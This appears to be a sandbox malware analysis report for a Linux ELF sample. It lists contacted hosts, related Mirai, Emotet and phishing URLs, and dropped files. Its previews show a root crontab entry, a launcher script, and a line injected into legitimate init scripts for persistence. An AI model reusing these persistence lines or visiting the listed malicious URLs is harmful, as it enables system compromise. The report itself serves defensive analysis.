/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/dns-udp4	0%	ReversingLabs
/etc/init.d/gdm3	0%	ReversingLabs
/etc/init.d/hddtemp	0%	ReversingLabs
/etc/init.d/hwclock.sh	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/iscsid	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/lightdm	0%	ReversingLabs
/etc/init.d/lm-sensors	0%	ReversingLabs
/etc/init.d/lvm2-lvmpolld	0%	ReversingLabs
/etc/init.d/mono-xsp4	0%	ReversingLabs
/etc/init.d/multipath-tools	0%	ReversingLabs
/etc/init.d/open-iscsi	0%	ReversingLabs
/etc/init.d/open-vm-tools	0%	ReversingLabs
/etc/init.d/plymouth	0%	ReversingLabs
/etc/init.d/plymouth-log	0%	ReversingLabs
/etc/init.d/procps	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/rsyslog	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ssh	0%	ReversingLabs
/etc/init.d/udev	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/init.d/x11-common	0%	ReversingLabs
/etc/profile.d/bash.cfg.sh	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
app.r727.ru	186.2.171.38	true	false		unknown
www.google.com	142.250.185.164	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://html4/loose.dtd	386.elf	false	high
http://.css	386.elf	false	high
http://.jpg	386.elf	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
186.2.171.38	app.r727.ru	Belize		262254	DDOS-GUARDCORPBZ	false
185.125.190.26	unknown	United Kingdom		41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
186.2.171.38	http://perfectnmonyes.shop/	Get hash	malicious	Unknown	Browse	perfectnmonyes.shop/
	http://prifectemonye.xyz/	Get hash	malicious	Unknown	Browse	prifectemonye.xyz/
	http://perftectmoney.tokyo/	Get hash	malicious	Unknown	Browse	perftectmoney.tokyo/
	http://perfectimoneye.click/	Get hash	malicious	Unknown	Browse	perfectimoneye.click/
	http://quickduu.click/	Get hash	malicious	Unknown	Browse	quickduu.click/
	http://perfecnmnoeyn.monster/	Get hash	malicious	Unknown	Browse	perfecnmnoeyn.monster/
	http://prenttcmnoey.xyz/	Get hash	malicious	Unknown	Browse	prenttcmnoey.xyz/
	http://prefectemonie.shop/	Get hash	malicious	Unknown	Browse	prefectemonie.shop/
	http://perfctnmnoey.xyz/	Get hash	malicious	Unknown	Browse	perfctnmnoey.xyz/
	http://prectiomoeiny.xyz/	Get hash	malicious	Unknown	Browse	prectiomoeiny.xyz/
185.125.190.26	main_arm5.elf	Get hash	malicious	Mirai	Browse
	gigops.mpsl.elf	Get hash	malicious	Gafgyt	Browse
	94.156.227.153-sora.arm5-2025-01-07T16_09_13.elf	Get hash	malicious	Mirai	Browse
	94.156.227.153-sora.m68k-2025-01-07T16_09_14.elf	Get hash	malicious	Mirai	Browse
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse
	arm.elf	Get hash	malicious	Mirai	Browse
	arm7.elf	Get hash	malicious	Mirai	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Mirai	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8=	Get hash	malicious	Unknown	Browse	142.250.185.228
	https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.co	Get hash	malicious	Unknown	Browse	142.250.181.228
	Selvi Payroll Benefits & Bonus Agreementfdp.pdf	Get hash	malicious	Unknown	Browse	172.217.18.4
	https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fde	Get hash	malicious	HTMLPhisher	Browse	142.250.186.164
	Your Google Account has been deleted due to Terms of Service violations.eml	Get hash	malicious	Unknown	Browse	172.217.16.196
	Your Google Account has been deleted due to Terms of Service violations.eml	Get hash	malicious	Unknown	Browse	142.250.185.132
	https://jmak-service.com/3225640388	Get hash	malicious	HTMLPhisher	Browse	142.250.185.196
	http://cdn.statisticline.com	Get hash	malicious	Unknown	Browse	142.250.186.132
	https://connect.intuit.com/portal/app/CommerceNetwork/view/scs-v1-01f29c80fd42416b93c1e1b116eb15aeb0bd36fe1ddc4e298589676767f7a30254c18947c53d4f9a9d199271c071ab8c?locale=EN_US	Get hash	malicious	Unknown	Browse	142.250.185.68
	https://mickhall.co.uk/owa-auth-logon.aspx/index.html	Get hash	malicious	Unknown	Browse	142.250.185.132

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	main_arm5.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	main_arm.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	mips.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	main_sh4.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	mips.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	ntpd.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	tftp.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
DDOS-GUARDCORPBZ	setup.exe	Get hash	malicious	Unknown	Browse	190.115.31.179
	https://alluc.co/watch-movies/passengers.html	Get hash	malicious	Unknown	Browse	190.115.19.71
	https://1wbapm.life	Get hash	malicious	Unknown	Browse	186.2.162.102
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	186.2.170.192
	xd.arm5.elf	Get hash	malicious	Mirai	Browse	190.115.27.208
	mNtu4X8ZyE.exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	75A0VTo3z9.exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	https://www.iphone.trustefy.org/	Get hash	malicious	Unknown	Browse	190.115.21.98
	https://u.to/W9rXIA	Get hash	malicious	Unknown	Browse	190.115.31.163
	https://u.to/SpzbIA	Get hash	malicious	Unknown	Browse	190.115.31.163

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/.mod	amd64.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	amd64.elf	Get hash	malicious	Unknown	Browse
	arm6.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	sBKWt6JPZa.elf	Get hash	malicious	Unknown	Browse
	libgdi.so.0.8.2.elf	Get hash	malicious	Unknown	Browse
	execute_and_cleanup.sh	Get hash	malicious	Unknown	Browse
	0S3wxWer8x.elf	Get hash	malicious	Unknown	Browse
	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/386.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5r:8M1
MD5:	77037D22D4F473F068BCE3E3318ACB01
SHA1:	8AB05FF9A8D9D73E2B23643B39D67EA1FF7A6418
SHA-256:	2F34A08D31571167FB11C6BA96496246219E44403A091B7F010B4C5559CB542B
SHA-512:	AE29513E81C527D8D27EF4CFE69E8D357632BA9AD944F7634D638DA486F8ABBDBD3181164C297A2AA3053D2BA46A5FB19471B5E809D2BB52996E4E2D312DF334
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: amd64.elf, Detection: malicious, Browse Filename: arm7.elf, Detection: malicious, Browse Filename: amd64.elf, Detection: malicious, Browse Filename: arm6.elf, Detection: malicious, Browse Filename: arm5.elf, Detection: malicious, Browse Filename: sBKWt6JPZa.elf, Detection: malicious, Browse Filename: libgdi.so.0.8.2.elf, Detection: malicious, Browse Filename: execute_and_cleanup.sh, Detection: malicious, Browse Filename: 0S3wxWer8x.elf, Detection: malicious, Browse Filename: ausNOyj9by.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.2

/etc/.cfg

Download File

Process:	/tmp/386.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	171
Entropy (8bit):	3.837356434529539
Encrypted:	false
SSDEEP:	3:0dkTLQKTBWTsbGqdtbGqb/8TRkTLQKTBWTsbGqdtbGqb//sNUdYXRGXGOaYXRGXT:0d4MIBVD3DuR4MIBVD3DL6UgRGWARGW+
MD5:	2607D7C0F936CD3CB81BD039088AEE62
SHA1:	9B66EFA9B6401E65B70C730493DCD4A27721D3FE
SHA-256:	9BF1BEDD12B3A2AE7662CE848DE0DBA544C352F36A86AE511A5F43A3D89A8013
SHA-512:	D66E605D81423B22DB5557811EF8D096D6C20C4D8142F5DD8BB2029BBA391A003864B20567FFEC8BC68A72F22D2068A6D97E366F9FC9200915D2F9D8B528128F
Malicious:	false
Reputation:	low
Preview:	e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263ea18.e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263ea18.e74ed74ec12818ace24ce20ec12818ace24ce20edf3910b3fd588618.

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.101745776620701
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOBdxAEGbsbcq1himLHLHmvgjWL:9tdVEA2+3MPi90Qbcq1Q4Hrmvt
MD5:	6BBECC4CA13C3007B79B315AD5B8EB33
SHA1:	E32443A6D19709D269DFD58D5D48F23192F8ED82
SHA-256:	98C12A01C2E5F562B14E931C9B503824429C82E088BA06BA43A6313565DB15DE
SHA-512:	29E15DE525FB44D5823429C80280CBF91592A546A5778EA6C056DFE7A390C4DEC2381D22649A110D14DD732473BB9BA7C43D482BAE2E7315120AE8BF9AFE502B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system.mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4216099972768905
Encrypted:	false
SSDEEP:	96:iKtDd9/iwtDaLE+E9nw3mFRzF+rv17AypQyhHk5eEkv:iCdld6E+UnKeRB+rv1cyOyZkq
MD5:	25EEDDA5AB2F0AF6683A5A1365EF11A0
SHA1:	76963A11F9F43D6BC6336B0A9610C8668E0F3E79
SHA-256:	37AAA474A96690F2C8BCAD49AB3E31D59D2E4749E2C3EEF7AFCB82406DF6FD81
SHA-512:	3D89F435223BC02FC71722A6FC3A256F30A15168A45DD239B28144593E66653DF43C8F2B0CBFF57BB432D68B26F98173B5F19A2EC6D4D319EDB76994902374CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.763929127414264
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfO05i1CPeueczZR11s+M8k93ILlfdW6910kF4T0Op:7RzgTNNOGi1eTrzZR1vX5fsKX00+
MD5:	816D2CB2EBBEA0A92840D29E03A3AEF2
SHA1:	DE872E6EAA118E80E9D7A3D1B0CA7C73FD30CB49
SHA-256:	2822A1618EEFA229CB29520923C7E47B61981E11D2028CD62611B18BCE215B87
SHA-512:	5BD322EA5D511EA3A5C7AB832FCCB7DA138C4E352CCD5A140F783B4E196A5C2A0FA33D5DFB54C353A15ADEF42E507D076E66C3C3546EE1E70F538EDA7E52EB7E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system.mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.2527487182090535
Encrypted:	false
SSDEEP:	96:RFCjnn83hjzYn1zJNSNuDNBqNPoNpDbANEFygG9M3zR4hszR4hxRl:Wjn4hjUD9dwl
MD5:	026032FB398BC8D223FFFAC164EC8BDC
SHA1:	2804934FD92CE102B1B64E908DE69B93BDAF0F62
SHA-256:	7EBDBADE1AA7BE3A53549975CD202067C822B137898B91AEE8148A96B80B82D5
SHA-512:	CAD3D3A4EBC3B0B3707B2B8FA5D301F0A8FEFBE78D7064B096A746AB2C0957B2AF29CA4BAFB4603EF0C80380EBC5AD40A7030C7B49BF62164B9DAFECD2C8CFB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.219163763155702
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZdWEdBuSZWg/e/fupMWDGdxboGxz5:jV/OxNDBusZABLm1BmyEbuSZWg2/TWOT
MD5:	8669B5F957342072FF16241BEAA010FD
SHA1:	2E45CEA64AEE1115B5EDBAAC7407B340E47EC7C1
SHA-256:	4DE7B672D754167242FEB9A95D9FA35514114948CFD3567B8BB8BF294F38FB17
SHA-512:	4F426321E4A7123B6E0B19DEF3455CEACBA152FCB5F21A106B809F3B2FB2054300F391DEE9E498749544ED22C8B351AD5E35658813209917672052988D21DF8F
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.853742484748698
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTSiVC2/uldA0uv3uKv2ZsGyjyRfg/zsDE7Ed:93oijU4ukTSCu40uv3uKvdJOR4ADHd
MD5:	D6F4FB4B6543A32644DC249C8B6D17A0
SHA1:	C5E44B40458D426759A7EB88B4E55C3ACEF94077
SHA-256:	05EF48FCD09FA3D2BC5C5297F0C9852810F8CBECEA65B0ED26A980D4A5F9D387
SHA-512:	06573A9DC46732518C4BAC856AA7C47B67CB0612BAC0192312A95699DF090782F457EBD138FCD6AE9858F8359209A54EC020115E1EFE450C2EA68D47E4554D30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.05188801367894
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcNlekvx2w5mw+76opC:73ZngWVWNMNH0YlbJ2w4wrJ
MD5:	E6D454B5675D599827B9892551BAF33F
SHA1:	FC529362E60C9D6B0DC86779CFA890B6621FD11E
SHA-256:	37F47BEF4B4D1021E5FDC6BD2F4E90FA9BA3175A83DB2BE094EF68F50A07828B
SHA-512:	3752D5178841DDD8FB9F09BDA4EB0D2FA4391BB951273B3911347AC93135E9A516919E28487724371F6A7CE689BAA053855A3219FC68944751313B0405BA48DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system.mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.405379841493847
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM9A5LmiEQoOZoKkkFoM+Zh9YkFoMr4Ote:79TcWC/BUeem92R4q5LRPt5w9VplA
MD5:	85F7B5D11EBD6ABDA86B5DF999F8B6D6
SHA1:	898A95C0302A0D24763D2B10EDC21E921564B1C8
SHA-256:	5A23A691BEE3E1D9A1723811D45030CCAD72CDFDA4AF1C1B5BEC6C027F8831D3
SHA-512:	9BED1FAE531015163C3665B24B678AEA239EC8FA6F92E06CCD044AEAF1B490251B5D7196876FAF1E8C3F2C73E208E268BF9DB6EC9B0535FC7CABA5DC6542F692
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.338919117179571
Encrypted:	false
SSDEEP:	24:9lBie8ItKzeBcxlo8/z3ejhGJckS5gzjdJ5ZWkZg7zcOqb6:938yKzYcX/LshGJckS5gJ58kG7A9b6
MD5:	BDD323E45B8053AC9234F45E20BABD66
SHA1:	0141637CE3CE6E3401B3863FED8103F825427055
SHA-256:	44922CED598FFB90525BA2E3285418AE91C2788E4A3DEE0EEE1C3DBF8191AC96
SHA-512:	9BCD74E42D402FCA871BB0B7900821401FA5F229DE02D977D130A48D35BC088BAE03B8FE5D235EA3E1C0309B4B35DF069AA51F496BF8FD5406CDD4BCBCD7B12F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system.mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.912604701068792
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38ClAATDuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsYDT6MnidD/A3gU
MD5:	C47C5241A33BA37060C9A1A58C167E9E
SHA1:	9ED529B5EFC37F87EF208A43161D198838600310
SHA-256:	6EECCBE60DB542164C6E4F3ADB1291DF01D1502F9A12531D2CCD7A95A88F1712
SHA-512:	B01E7002EF994DF92650E51AA40438F636A8EEE1ABD5E6B6E65F64791CB78C49F412DDD29F82D5840ABDD917CF008713C7D2FBA0E929656ECF713DBB71B255AF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.163687656510361
Encrypted:	false
